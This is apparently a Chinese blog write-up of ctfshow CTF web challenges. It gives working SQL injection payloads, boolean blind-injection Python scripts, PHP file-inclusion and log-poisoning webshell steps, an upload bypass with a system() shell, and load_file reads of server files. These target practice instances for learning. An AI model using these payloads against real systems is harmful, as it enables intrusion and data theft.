ctfshow web(非web入门)

最新推荐文章于 2024-06-29 14:56:42 发布
最新推荐文章于 2024-06-29 14:56:42 发布
阅读量2.1k 收藏
点赞数
分类专栏: ctfshow CTF 文章标签: nginx 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52033041/article/details/120803967
版权
CTF 同时被 2 个专栏收录
11 篇文章 1 订阅
订阅专栏
ctfshow
5 篇文章 0 订阅
订阅专栏

web签到题

image-20211015093316118

查看源代码:

image-20211015145242574

base64解码即可:

image-20211015145305192

web2

题目提示:最简单的sql注入

image-20211015150846821

使用admin’or 1=1#登录成功

image-20211015151016492

admin’ union select 1,2,3# 获得注入位置

admin’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 获得表(flag,user)

admin’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag’# 获得列(flag)

admin’ union select 1,group_concat(flag),3 from flag# 获得flag

image-20211015151329563

Web3

题目提示:更简单的web题

image-20211015151436040

是一个文件包含,使用data协议

?url=data://text/plain,<?PHP system('ls');?>

image-20211015151837331

查看ctf_go_go_go文件即可

image-20211015151857098

web4

image-20211015151952599

文件包含,过虑了几种协议,可以包含日志

?url=/var/log/nginx/access.log

image-20211015152351083

使用ua头写入木马

image-20211015152435595

包含日志,调用木马

image-20211015152529565

image-20211015152542185

flag文件在/var/www目录下

web5

直接给php源码了

    <?php
        $flag="";
        $v1=$_GET['v1'];
        $v2=$_GET['v2'];
        if(isset($v1) && isset($v2)){
            if(!ctype_alpha($v1)){
                die("v1 error");
            }
            if(!is_numeric($v2)){
                die("v2 error");
            }
            if(md5($v1)==md5($v2)){
                echo $flag;
            }
        }else{
        
            echo "where is flag?";
        }
    ?>

v1必须为字母 v2必须为数字 md5弱比较,如果md5加密后前两位是0e则判断为相等

?v1=QNKCDZO&v2=240610708

image-20211015153217341

web6

image-20211015153316388

sql注入过虑了空格使用/**/代替

username=admin’//or//1=1#&password=1 回显正常

username=admin’//union//select//1,group_concat(table_name),3//from//information_schema.tables//where/**/table_schema=database()#&password=1 获得表(flag,user)

username=admin’//union//select//1,group_concat(column_name),3//from//information_schema.columns//where/**/table_name=‘flag’#&password=1 获得列(flag)

username=admin’//union//select//1,group_concat(flag),3//from/**/flag#&password=1 获得flag

image-20211015154028667

web7

image-20211015155417553

随便点开一篇文章,看到url中有传参,猜测是sql注入

image-20211015155446687

过虑了空格使用/**/代替 使用– 进行注入

?id=-3//union//select/**/1,2,3–

?id=-3//union//select//1,group_concat(table_name),3//from//information_schema.tables//where/**/table_schema=database()-- (flag,page,user)

不能获得列,换一种思路

使用布尔注入,如果为真则返回全部文章,如果为假则不返回

为真:

image-20211015191944761

为假:

image-20211015192007612

上脚本

import requests

flag = ''
url = 'http://ef25a6c5-9a64-44cd-920b-86847aaaa9a7.challenge.ctf.show'
for i in range(100):
    for j in range(32,128):
        #获得表:?id=-1/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))={}
        #获得列:?id=-1/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="flag"),{},1))={}
        #
        payload = '?id=-1/**/or/**/ascii(substr((select/**/group_concat(flag)/**/from/**/flag),{},1))={}'.format(i,j)
        res = requests.get(url=url+payload)

        if("A Child's Dream of a Star" in res.text):
            flag += chr(j)
            print(flag)

web8

在上一题的基础上过虑了union和,

直接上脚本:

# -*- codeing = utf-8 -*-
# @Time : 2021/10/15 22:46
# @Author : CCc1
# @Software: PyCharm

import requests

url = 'http://0b9a2b99-5e7f-411e-9c17-8ab245c72351.challenge.ctf.show/index.php'
flag = ''

import requests
s=requests.session()
url='http://0b9a2b99-5e7f-411e-9c17-8ab245c72351.challenge.ctf.show/index.php'
table=""

for i in range(1,45):
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

web9

image-20211015233705341

访问robots.txt,获得index.phps

image-20211015233744604

index.php源码:



<?php
        $flag="";
		$password=$_POST['password'];
		if(strlen($password)>10){
			die("password error");
		}
		$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						 echo "登陆成功<br>";
						 echo $flag;
					 }
			}
    ?>

可以看到登录成功就有flag

有一个特殊的字符串,可以绕过md5($str,true)

ffifdyop

ffifdyop这个字符串md5加密后为:276f722736c95d99e921722cf9ed621c

转换成字符串为:'or’66�]��!r,��b

sql语句就为:select * from user where username =‘admin’ and password =’'or’6xxxx’

就能登录成功

image-20211015234258862

web10

image-20211015234443695

点击取消可以获得index.phps

image-20211015234507465

源码:



<?php
		$flag="";
        function replaceSpecialChar($strParam){
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if (!$con)
        {
            die('Could not connect: ' . mysqli_error());
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
			die("sql inject error");
		}
		$sql="select * from user where username = '$username'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						if($password==$row['password']){
							echo "登陆成功<br>";
							echo $flag;
						}

					 }
			}
    ?>

把常用的都给过虑了

        function replaceSpecialChar($strParam){
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }

因为下面这个条件,不能使用双写绕过

if(strlen($username)!=strlen(replaceSpecialChar($username))){
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
			die("sql inject error");
		}

mysql中group by会对值进行排列

image-20211016001556095

with rollup(group by后可以跟with rollup,在分组的基础上再次进行汇总)

count()统计有多少个

image-20211016001940097

最后会的得到一行password为null的汇总之和,这样password为空就可以绕过了

username=admin’or//1=1//group//by//password//with//rollup#&password=

image-20211016002124939

web11

image-20211016002209235

给了一段代码:

<?php
        function replaceSpecialChar($strParam){
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if(strlen($password)!=strlen(replaceSpecialChar($password))){
            die("sql inject error");
        }
        if($password==$_SESSION['password']){
            echo $flag;
        }else{
            echo "error";
        }
    ?>

p a s s w o r d = = password== password==_SESSION[‘password’]的时候才能获得flag

先抓个包

image-20211016103504268

可以看到cookie中包含了session,并且password以get方式传值,

可以将cookie中的phpsessid删除这样就会使的$_SESSION[‘password’]为空,然后将password的值改为空

这样就能 p a s s w o r d = = password== password==_SESSION[‘password’]

image-20211016103757396

web12

image-20211016103842804

查看源代码,发现一个提示:?cmd=

image-20211016103918598

查看一下phpinfo

?cmd=phpinfo();

发现把能用的函数基本都过虑了

image-20211016105921017

使用print_r和scandir或glob查看本目录文件

?cmd=print_r(scandir(’.’));

?cmd=print_r(glob(’*’));

image-20211016112055646

然后使用highlight_file()函数将flag文件显示出来

?cmd=highlight_file(‘903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php’);

image-20211016112141029

web13

image-20211016162008915

经过测试不能能上传php文件 php文件中不能有_(看到源码后发现是错误的),可以上传.user.ini

image-20211016195255466

在上传一个1.png内容为:

<?php system(‘ls’);?>

image-20211016195421004

然后访问首页,可以看到目录下的文件,发现有一个upload.php.bak,把它下载下来

image-20211016195547799

源码:

<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}

 ?>

文件大小不能超过24

文件名长度不能超过9

不能是php后缀

使用短标签进行获得flag

继续上传1.png内容为:

<?=system('cat 9*');?>

image-20211016201340024

web14

源码:

<?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__);

switch有一个特性,如果case没有遇到break则执行下面的case直到有break

可以看到下方代码,没有break并且可以输出$url

        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";

image-20211016203135934

获得here_1s_your_f1ag.php文件

访问是一个查询页面

image-20211016203205645

输入flag发现报错,猜测是注入

image-20211016203240987

进行抓包,输入‘报错

image-20211016203324574

过虑了空格

?query=1//and//1=1# 回显正常

query中不能有information_schema.tables information_schema.columns linestring polygon

可以使用反引号进行绕过

反引号是为了区分mysql的保留字于普通字符而引入的符号

image-20211016203415597

?query=-1//union//select/**/database()# 获得当前数据库(web)

?query=-1//union//select//group_concat(table_name)//from//information_schema.tables//where/**/table_schema=database()# 获得表(content)

?query=-1//union//select//group_concat(column_name)//from//information_schema.columns//where/**/table_name=‘content’#获得列(id,username,password)

?query=-1//union//select//group_concat(id,username,password)//from/**/content# 读取数据发现是假flag

image-20211016205407150

根据提示tell you a secret,secret has a secret…

猜测flag可能在secret.php文件中

进行读取:

?query=-1//union//select/**/load_file(’/var/www/html/secret.php’)#

获得源码:

<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
	echo file_get_contents('/real_flag_is_here');
}

接着读取/real_flag_is_here

?query=-1//union//select/**/load_file(’/real_flag_is_here’)#

image-20211016205734527

菜菜菜菜菜菜菜1
关注
专栏目录
CTFshow(web入门)(10~16)
chenjyboke的博客
01-28 1951
web10 提示: cookie 只是一块饼干,不能存放任何隐私数据 解决:直接找到cookie web11 提示: 域名其实也可以隐藏信息,比如ctfshow.com 就隐藏了一条信息 解决: DNS域名查询获得flag web12 提示: 有时候网站上的公开信息,就是管理员常用密码 解决: 猜测账号为admin,密码在网站页面中找到。登录获得flag web13 提示: 技术文档里面不要出现敏感信息,部署到生产环境后及时修改默认密码 解决:寻找敏感信..
ctfshow web入门 信息搜集
ccfly1012的博客
08-11 622
目录 web1 web2 web3 web4 web5 web6 web7 web8 web9 web10 web11 web12 web13 web14 web15 web16 web17 web18 web19 web20 web1 右键直接查看源代码就好 web2 js绕过 f12查看源代码被禁用了,右键也不行 查看源代码还有方式就是ctrl+u;view:source;点击工具更多工具,开发者工具 web3 直接开发者工具查看包的http协
CTFshow_web入门_信息搜集
ScyLamb的博客
01-20 289
https://blog.csdn.net/qq_44893894/article/details/109380529 0x00 web1 payload:查看源代码 0x01 web2 <script type="text/javascript"> window.oncontextmenu = function(){return false}; window.onselectstart = function(){return false}; window.onkeydown = func
【靶场】ctfshow 详解web259原生类反序列化
最新发布
Yuppie001的博客
06-29 781
在编程中,假设你用 PHP 写了一个网站,需要从另外一个服务器获取一些信息(比如天气预报),而这个服务器使用的是一种叫做 SOAP 的协议。通过构造一个SOAP客户端,并调用了getFlag的远程SOAP服务方法,这个调用过程由PHP的__call魔术方法处理,负责发送SOAP请求并接收响应。当然,这道题也可以不用反序列化来做,直接访问bp进行抓包,添加对应的xff头和相应数据块即可获得flag。的原因,所以后面的部分全部被忽略,真实有效的数据包为黄色部分。黄色部分为构造的数据包,因为。
ctfshow之web(9、10、11、12)
沃和莱特的博客
03-12 5162
萌新萌新,不忘初心。
ctfshow web入门
weixin_59560134的博客
05-10 207
web10 由题目 可猜测
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(1)
2401_84297265的博客
04-28 826
只是过滤了分号,其他同上。php的最后一个分号可以省略。
CTFShow Web入门_爆破
qq_19533763的博客
04-01 1160
Web21 随便输入抓包 发现Base64加密 账号和密码用:隔开 使用BP构造payload爆破 下载官方提供的字典 把后缀名改为.zip即可打开 使用Custom iterator模式 第一部分 第二部分 第三部分使用字典 添加base64加密 关闭url编码 爆破完按length排序查看最小的回包 Web22 子域名爆破,爆破ctf.show 最终在vip.ctf.show的源码发现了flag Web23 error_reporting(0); include('fla
ctfshow web入门 文件上传前篇(web151-web160)
ccfly1012的博客
09-17 1097
目录 web151-web152 web153 web154 web155 web156 web157-web159 web160 web161 web151-web152 首先写一个一句哈: <?php @eval($_POST["1"]);?> 然后修改文件后缀为png(题目限制),上传文件同时进行抓包,然后修改后缀php,然后蚁剑连接,找到flag 拿到flag~~~~ web153 使用.user.ini绕过 .user.ini 摘抄...
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1098
ctfshow-web入门-爆破wp
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1325
ctfshow web29 web30 web31
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2648
CTFShow-WEB入门篇--信息搜集详细Wp
CTF刷题网站汇总(包括本地可以自己搭建的)(1)
热门推荐
qq_51550750的博客
01-29 1万+
CTF刷题网站汇总(包括本地可以自己搭建的) CTF刷题平台汇总(欢迎各位师傅们补充) 第一个当然是CTFshow啦!https://ctf.show/ 攻防世界 https://adworld.xctf.org.cn/ Bugku https://ctf.bugku.com/ 论剑场 https://new.bugku.com/ Buuctf https://buuoj.cn/ Jarvisoj https://www.jarvisoj.com/ 墨者学院 https://www.mozhe.cn/ 看雪
ctfshow-网络迷踪-新手上路 ( 使用百度搜图收集景点信息)
wangyuxiang946的博客
09-05 1万+
ctf.show 网络迷踪模块第1关, 只有一座桥的图片, 拿到桥的名字即可, 推荐使用百度搜图 先把图片下载到本地 使用百度搜图收集图片中的景点信息 根据搜图的结果可以发现, 图片的来源均指向同一个地方: 三亚蜈支洲岛 接下来, 百度搜索 '三亚蜈支洲岛', 找到了一个类似官网的网站, 点进去看看有没有我们需要的信息 进入官网后, 往下滑, 滑到中间的 '岛屿风貌' 模块有一个情人桥, 跟我们的图片很像, 点进去看看 这不就是我的桥吗, ...
『网络迷踪』ctfshow-光说不练
Ho1aAs‘s Blog
09-06 1003
题目 找出此街道的名称 开始搜索 首先看图例:这是一条东西向的街道 观察远景:街道尽头有一个丁字路口,道路大致南北向,有南低北高;远处则是树和高楼,最远处是高山。高楼说明可能道路是位于城市或近郊 对于道路还有一个小细节:灯杆的影子似乎和道路存在夹角,推测道路不是正南北走向的,而是西北-东南向 另外:街道很窄,两侧有房屋,停放了车辆,只够一辆车通过,猜测属于城区的居民区或是近郊 可以画个简图: 观察近景: 左侧有一红色的左舵的斯柯达 右侧是一辆大众,有车牌 结合大众和斯柯达这两款车,它们的主要
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!
qq_44005305的博客
11-12 290
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
网络安全
12-05 1317
对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.ne...
ctfshow-萌新(持续更新)
i_kei的博客
01-10 1万+
萌新认证 加入qq群:372619038 进群喊:萌新码 萌新_密码1 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 首先16进制转字符 发现一串base64编码的字符串,解密后得到栅栏加密的字符串 base64加密解密 栅栏解密后得到flag 萌新_密码2 出题人已累,随便敲了几下键盘。。。 rdcvbg 2qase3 6tgh
CTFshow——萌新记忆
D.MIND 的博客
03-15 1417
一进来,看了前两篇悲惨记忆,忽记起我还要做题呢,于是赶紧寻找线索… 发现页面都没什么可利用的,尝试访问别的页面,用dirsearch可以扫描出/admin/目录,没错,是扫出目录而不是一个页面,所以访问的时候别忘记admin后面加/ (多么菜的领悟>_<) 来到一个登录页面,随手试试or和and,返回要报警的信息,用burp来Fuzz一下 发现and or # - if =等都被过滤了 但( ) || , substr length可以用,||可以代替or 那么就是bool盲注了 经过尝试是会发
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值